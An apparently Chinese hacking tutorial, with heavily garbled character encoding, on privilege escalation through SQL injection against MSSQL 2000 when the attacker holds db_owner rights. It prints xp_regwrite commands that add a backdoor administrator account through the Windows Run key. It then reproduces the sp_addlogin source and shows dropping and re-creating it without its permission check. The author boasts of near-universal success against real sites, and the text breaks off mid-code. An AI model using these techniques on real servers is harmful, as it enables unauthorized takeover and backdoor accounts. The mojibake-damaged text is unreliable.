聲明:本文僅用于教學目的�,如果因為本文造成的攻擊后果本人概不負責����。因為
發(fā)覺其危害過大,原文已經經過大量刪減及修改����,即使這樣本文的危害性仍然很
大,所以請大家不要對國內的站點做任何具有破壞性的操作����。
考慮再三,偶還是決定發(fā)出來��。此招手段歹毒����,利用范圍廣泛,可以說是只要是
有sql注射漏洞的網站�����,只要運用此法99%可以拿到webshell甚至系統(tǒng)權限(不敢
把話說滿�,呵呵,經本人數百次真實"實戰(zhàn)演習",基本上是100%可以拿到
webshell甚至系統(tǒng)權限)��。
記得我在《MSSQL db_owner角色注入直接獲得系統(tǒng)權限(續(xù))》中寫過一種
利用xp_regwrite來取得系統(tǒng)權限的方法:xp_regwrite
"HKEY_LOCAL_MACHINE","SOFTWARE\Microsoft\Windows\currentversion\run","xwq1","REG_SZ","net user xwq xwq /add"
xp_regwrite
"HKEY_LOCAL_MACHINE","SOFTWARE\Microsoft\Windows\currentvers ion\run","xwq2","REG_SZ","net localgroup administrators xwq /add"�����,只要讓網站所在
的服務器重起�����,就能得到系統(tǒng)權限����。經過本人的數百次的真實實驗,這種方法不太實用��,很容易引起網管的注意���,再說ddos也是違法的事(偶可是好人?����。?,發(fā)動一場ddos要花費的大量的人力�����,物力(看你的肉雞多少拉)����。所以不太可行(除非是你十分想要搞定的網站)。
呵呵�����,哆嗦拉那么多����,你可能看的已經不耐煩拉,好��,這就介紹我的三大必殺技之一————萬能提權��。
假如一個網站存在sql注射漏洞�����,如果這個網站是用固定服務器sysadmin權限的用戶作的連接(呵呵�����,通俗點說就是sa,菜鳥可以這樣認為)�,呵呵,想要拿到一個webshell或者是系統(tǒng)權限可以說是易如反掌�����,輕而易舉的事��,據我所知��,sysadmin權限要拿到webshell或者系統(tǒng)權限不下10種����,呵呵,可能更多吧(偶只會10種)�����,sysadmin怎么拿到webshell或者系統(tǒng)權限�����,我不想多說����,想比大家都已經爛熟于心拉�����,可是要是一個網站是db_owner權限呢?你怎么辦���,你怎么拿系統(tǒng)權限����,怎么拿webshell(沒有上傳漏洞和數據庫備份等功能)�,大家可能回說backup a shell,我記得LCX也在《MSSQL db_owner角色注入直接獲得系統(tǒng)權限》里說過拉"備份得到的shell只是理論化的東東����,如果一個webshell有20mb的話,你還能用它嗎���?"呵呵����,要是我告訴你db_owner拿到一個webshell或者是系統(tǒng)權限的方法和sysadmin權限的一樣多�,你回有什么反映,是不是覺得有點不可思議���,或者又是我胡說呢��?(不相信的朋友�����,下面的內容就不要看拉)
呵呵���,是不是看的心癢癢拉��,迫不及待的想知道啊����,好����,我不在廢話拉,這就把我的三大必殺技之一————萬能提升權限方法告訴大家����。
在告訴大家之前,我們先做個實驗
實驗環(huán)境windowsxp sp1+SQL 2000 sp3,大家跟著我來step to step,首先新建一個具有db_owner的權限的用戶��,這里我是xwq(就是在服務器角色里面什么都不要選���,在數據庫角色里面鉤上db_owner)���,好����,現在我們打開查詢分析器用xwq連上后再里面輸入sp_addlogin xuwenqiang,執(zhí)行看看��,出現拉什么��?
服務器: 消息 2571���,級別 14,狀態(tài) 2����,過程 sp_addlogin,行 16
用戶 "xwq" 沒有運行 DBCC auditevent 的權限��。
服務器: 消息 15247�����,級別 16��,狀態(tài) 1,過程 sp_addlogin�,行 17
用戶沒有執(zhí)行此操作的權限。
呵呵��,出現上面的錯誤信息這很正常�����,因為只有sysadmin 和 securityadmin 固定服務器角色的成員才可以執(zhí)行 sp_addlogin�,那么怎么才好讓sp_addlogin為我
所用呢?我們在這里看一下sp_addlogin的代碼:
create procedure sp_addlogin
@loginame sysname
,@passwd sysname = Null
,@defdb ; ; sysname = "master" -- UNDONE: DEFAULT
CONFIGURABLE???
,@deflanguage sysname = Null
,@sid varbinary(16) = Null
,@encryptopt varchar(20) = Null
AS
-- SETUP RUNTIME OPTIONS / DECLARE VARIABLES --
set nocount on
Declare @ret int -- return value of sp call
-- CHECK PERMISSIONS --
IF (not is_srvrolemember("securityadmin") = 1)
begin
dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid)
raiserror(15247,-1,-1)
return (1)
end
ELSE
begin
dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid)
end
-- DISALLOW USER TRANSACTION --
set implicit_transactions off
IF (@@trancount > 0)
begin
raiserror(15002,-1,-1,"sp_addlogin")
return (1)
end
-- VALIDATE LOGIN NAME AS:
-- (1) Valid SQL Name (SQL LOGIN)
-- (2) No backslash (NT users only)
-- (3) Not a reserved login name
execute @ret = sp_validname @loginame
if (@ret <> 0)
return (1)
if (charindex("\", @loginame) > 0)
begin
raiserror(15006,-1,-1,@loginame)
return (1)
end
--Note: different case sa is allowed.
if (@loginame = "sa" or lower(@loginame) in ("public"))
begin
raiserror(15405, -1 ,-1, @loginame)
return (1)
end
-- LOGIN NAME MUST NOT ALREADY EXIST --
if exists(select * from master.dbo.syslogins where loginname =
@loginame)
begin
raiserror(15025,-1,-1,@loginame)
return (1)
end
-- VALIDATE DEFAULT DATABASE --
IF db_id(@defdb) IS NULL
begin
raiserror(15010,-1,-1,@defdb)
return (1)
end
-- VALIDATE DEFAULT LANGUAGE --
IF (@deflanguage IS NOT Null)
begin
Execute @ret = sp_validlang @deflanguage
IF (@ret <> 0)
return (1)
end
ELSE
begin
select @deflanguage = name from master.dbo.syslanguages
where langid = @@default_langid --server default
language
if @deflanguage is null
select @deflanguage = N"us_english"
end
-- VALIDATE SID IF GIVEN --
if ((@sid IS NOT Null) and (datalength(@sid) <> 16))
begin
raiserror(15419,-1,-1)
return (1)
end
else if @sid is null
select @sid = newid()
if (suser_sname(@sid) IS NOT Null)
begin
raiserror(15433,-1,-1)
return (1)
end
-- VALIDATE AND USE ENCRYPTION OPTION --
declare @xstatus smallint
select @xstatus = 2 -- access
if @encryptopt is null
select @passwd = pwdencrypt(@passwd)
else if @encryptopt = "skip_encryption_old"
begin
select @xstatus = @xstatus | 0x800, -- old-style
encryption
@passwd = convert(sysname, convert(varbinary
(30), convert(varchar(30), @passwd)))
end
else if @encryptopt <> "skip_encryption"
begin
raiserror(15600,-1,-1,"sp_addlogin")
return 1
end
-- ATTEMPT THE Insert OF THE NEW LOGIN --
Insert INTO master.dbo.sysxlogins VALUES
(NULL, @sid, @xstatus, getdate(),
getdate(), @loginame, convert(varbinary(256), @passwd),
db_id(@defdb), @deflanguage)
if @@error <> 0 -- this indicates we saw duplicate row
return (1)
-- Update PROTECTION TIMESTAMP FOR MASTER DB, TO INDICATE
SYSLOGINS CHANGE --
exec("use master grant all to null")
-- FINALIZATION: RETURN SUCCESS/FAILURE --
raiserror(15298,-1,-1)
return (0) -- sp_addlogin
GO
之所以只有 sysadmin 和 securityadmin 固定服務器角色的成員才可以執(zhí)行
sp_addlogin�,主要是這里一段再搞鬼
-- CHECK PERMISSIONS --
IF (not is_srvrolemember("securityadmin") = 1)
begin
dbcc auditevent (104, 1, 0, @loginame, NULL, NULL, @sid)
raiserror(15247,-1,-1)
return (1)
end
ELSE
begin
dbcc auditevent (104, 1, 1, @loginame, NULL, NULL, @sid)
end
只要我們把這段代碼刪拉,任何權限的用戶都可以增加用戶拉�。
好,我們先把sp_addlogin刪拉
drop procedure sp_addlogin
然后再來恢復sp_addlogin
create procedure sp_addlogin
@loginame sysname
,@passwd sysname = Null
,@defdb ; ; sysname = "master" -- UNDONE: DEFAULT
CONFIGURABLE???
,@deflanguage sysname = Null
,@sid varbinary(16) = Null
,@encryptopt
